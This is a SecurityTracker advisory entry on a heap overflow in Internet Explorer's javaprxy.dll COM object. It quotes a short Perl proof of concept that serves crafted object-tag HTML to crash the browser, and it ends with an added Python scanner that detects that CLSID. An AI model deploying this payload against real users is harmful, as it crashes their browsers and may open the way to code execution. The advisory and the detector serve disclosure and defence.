SecurityTracker.com
Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE)
Vendors:  Microsoft
(Vendor Describes Workarounds) Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Crash the Browser
SecurityTracker Alert ID:  1014363
SecurityTracker URL:  http://securitytracker.com/id?1014363
CVE Reference:  CAN-2005-2087
Date:  Jul 2 2005
Impact:  Denial of service via network
Vendor Confirmed:  Yes  
Advisory:  Microsoft Security Advisory
Version(s): 6 SP1 and prior versions
Description:  A vulnerability was reported in Microsoft Internet Explorer in 'javaprxy.dll'. A remote user can cause the target user's browser to crash or potentially execute arbitrary code.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a heap overflow in 'javaprxy.dll' and cause the target user's browser to crash. Specially crafted object tags can cause certain COM components to crash.

It may be possible to overwrite a function pointer to execute arbitrary code. However, the vendor could not reproduce a function pointer overwrite.

A demonstration exploit is provided:

#!/usr/bin/perl

# in order for this to work javaprxy.dll must be available on the client.

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

my $html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";

print "Content-Type: text/html;\r\n\r\n";

print $html1.("A"x30000).$html2;

The vendor was notified on June 17, 2005.

sk0L and Martin Eiszner from SEC-CONSULT discovered this vulnerability.
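
A defensive check for the object-tag pattern described above, added here as an example (it is not part of the original advisory or of the vendor's workarounds): a content scanner that flags HTML instantiating the javaprxy.dll CLSID through an object tag. The names ObjectTagScanner and find_blocked_objects are hypothetical, the sample pages are constructed, and where the scanner runs (for instance a proxy or mail gateway) is an assumption.

```python
import re
from html.parser import HTMLParser

# CLSID of the javaprxy.dll COM object, as given in the advisory.
JAVAPRXY_CLSID = "03D9F3F2-B0E3-11D2-B081-006008039BF0"

# Tolerant match: any case, optional braces, stray whitespace around the GUID.
_CLSID_RE = re.compile(
    r"^\s*clsid\s*:\s*\{?\s*([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\s*\}?\s*$",
    re.IGNORECASE,
)

class ObjectTagScanner(HTMLParser):
    """Records (CLSID, line) for every <object classid=...> start tag."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag/attribute names and decodes character
        # references in attribute values before calling this method.
        if tag != "object":
            return
        for name, value in attrs:
            match = _CLSID_RE.match(value or "") if name == "classid" else None
            if match:
                self.found.append((match.group(1).upper(), self.getpos()[0]))

def find_blocked_objects(html, blocked=(JAVAPRXY_CLSID,)):
    """Return [(clsid, line)] for object tags that reference a blocked CLSID."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    wanted = {clsid.upper() for clsid in blocked}
    return [hit for hit in scanner.found if hit[0] in wanted]

# Constructed sample pages (not captured traffic). The flagged one uses mixed
# case, a line break inside the tag, braces and a character reference.
SAMPLE_FLAGGED = ('<html><body>\n<OBJECT\n  ClassID="&#99;lsid:'
                  '{03d9f3f2-b0e3-11d2-b081-006008039bf0}"></OBJECT>\n</body></html>')
# Benign page referencing an unrelated CLSID.
SAMPLE_BENIGN = ('<html><body>\n<object classid='
                 '"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"></object>\n</body></html>')

if __name__ == "__main__":
    for label, page in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(label, find_blocked_objects(page))
```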

Impact:  A remote user can cause the target user's browser to crash.

A remote user may be able to execute arbitrary code on the target system [however, code execution was not confirmed in the report].

Solution:  No solution was available at the time of this entry.

Microsoft has described some workarounds in their advisory, available at:

http://www.microsoft.com/technet/security/advisory/903144.mspx

Vendor URL:  www.microsoft.com/technet/security/advisory/903144.mspx
Cause:  Exception handling error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 29 2005 Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Crash the Browser



 Source Message Contents

Date:  Sat, 2 Jul 2005 11:25:37 -0400
Subject:  http://www.microsoft.com/technet/security/advisory/903144.mspx

 
 
 
> Microsoft Security Advisory (903144)
> A COM Object (Javaprxy.dll) Could Cause Internet Explorer to Unexpectedly Exit
 


Copyright 2005, SecurityGlobal.net LLC